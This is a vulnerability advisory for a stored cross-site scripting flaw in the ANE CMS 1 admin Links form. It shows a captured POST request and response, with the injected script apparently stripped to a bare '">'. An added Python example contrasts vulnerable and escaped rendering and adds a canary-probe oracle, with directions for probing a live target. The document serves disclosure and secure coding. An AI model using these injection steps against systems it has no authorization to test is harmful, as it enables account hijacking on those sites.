=======================================================================
ANE CMS 1 Persistent XSS Vulnerability
=======================================================================
by Pratul Agrawal

# Vulnerability found in: Admin module
# Email: Pratulag@yahoo.com
# Company: aksitservices
# Credit: Pratul Agrawal
# Software: ANE CMS 1
# Site page: http://demo.anecms.com/index.php
# Category: CMS / Portals
# Platform: PHP

# Proof of concept

# Targeted URL: http://server/acp/index.php?p=cfg&m=links

In the ADD LINKS form, submit the malicious script as the new link's Name and Link values; it is stored in the database and rendered back into the Links table. That is:
"> ">
=======================================================================
Request
=======================================================================
POST /acp/index.php?p=cfg&m=links&id=0 HTTP/1.1
Host: demo.anecms.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://demo.anecms.com/acp/index.php?p=cfg&m=links
Cookie: PHPSESSID=200fecb6b36334b983ebe251d11a5df9
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

name=">&link=">&type=1&view=0

=======================================================================
Response
=======================================================================
HTTP/1.1 200 OK
Date: Thu, 11 Mar 2010 06:59:03 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset: utf-8
Content-Length: 7771

(response body, rendered as text)

Transdmin Light
Administration
Configuration » Links

Add a new Link

Barra Links | Menu Links

Name        Link                     Options
Bar Links
Home        index.php                Modify Delete Move Down
Blog        blog                     Modify Delete Move up Move Down
Registrati  register                 Modify Delete Move up Move Down
ACP         acp                      Modify Delete Move up Move Down
Widgets     index.php?modifywidgets  Modify Delete Move up Move Down
master      master.asp               Modify Delete Move up Move Down
">          ">                       Modify Delete Move up Move Down
Menu Links
home        index.php                Modify Delete Move up Move Down
Blog        blog                     Modify Delete Move up Move Down

=======================================================================
After the link is saved, simply refresh the page: the stored script is rendered back into the Links table and executes on every load.

# If you have any questions, comments, or concerns, feel free to contact me.
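The pattern behind this advisory, as an added example that is not ANE CMS's own code (the CMS source is not on this page): a hypothetical renderer for the Links table that interpolates the stored name and link into an attribute unescaped, next to a hardened version that escapes each value for its context and allowlists the link scheme, plus a small oracle you can run over a captured response body to tell whether a probe value broke out of the attribute. The `<canary>` probe, the row markup and the helper names are assumptions; the form field names (name, link, type, view) are those from the request above.

```python
import html
from urllib.parse import urlencode, urlsplit

# Constructed sample inputs (not from the advisory): a benign link row and an
# attribute-breakout probe. The probe uses a harmless canary tag in place of a
# real script payload, which is enough to show the context break.
BENIGN = {"name": "Blog", "link": "blog"}
PROBE = {"name": '"><canary>', "link": '"><canary>'}

# "" covers relative paths such as index.php or blog.
ALLOWED_SCHEMES = {"", "http", "https"}


def build_post_body(entry: dict) -> str:
    """Form body in the shape of the advisory's POST (type=1, view=0 assumed
    constant); urlencode percent-encodes the probe so it travels intact."""
    return urlencode({"name": entry["name"], "link": entry["link"],
                      "type": 1, "view": 0})


def render_row_vulnerable(entry: dict) -> str:
    """Hypothetical sketch of the bug class: stored values are dropped into
    attribute context verbatim, so a leading "> closes the attribute and the
    tag, and whatever follows is parsed as new markup."""
    return (
        f'<tr><td><input type="text" name="name" value="{entry["name"]}"></td>'
        f'<td><a href="{entry["link"]}">{entry["link"]}</a></td></tr>'
    )


def safe_href(link: str) -> str:
    """Escaping alone does not stop javascript: or data: URLs inside href;
    keep relative paths and http(s), neutralise every other scheme."""
    scheme = urlsplit(link).scheme.lower()
    return link if scheme in ALLOWED_SCHEMES else "#"


def render_row_hardened(entry: dict) -> str:
    """Same row, each field escaped for its context. quote=True also converts
    " and ', so the value can never terminate the attribute it sits in."""
    name = html.escape(entry["name"], quote=True)
    link = html.escape(safe_href(entry["link"]), quote=True)
    return (
        f'<tr><td><input type="text" name="name" value="{name}"></td>'
        f'<td><a href="{link}">{link}</a></td></tr>'
    )


def probe_survives(markup: str, marker: str = "<canary>") -> bool:
    """Stored-XSS oracle for a captured response body: True if the probe tag
    appears as live markup. Escaped output only contains &lt;canary&gt;."""
    return marker in markup


if __name__ == "__main__":
    print("POST body:", build_post_body(PROBE))
    for label, render in (("vulnerable", render_row_vulnerable),
                          ("hardened", render_row_hardened)):
        out = render(PROBE)
        print(f"{label}: probe survives = {probe_survives(out)}")
        print("  ", out)
```

To use the oracle against a real target, submit `build_post_body(PROBE)` to the ADD LINKS endpoint with an authenticated session, reload the Links page, and pass the response body to `probe_survives`; a True result means the stored value is being rendered without escaping, which is the condition this advisory reports.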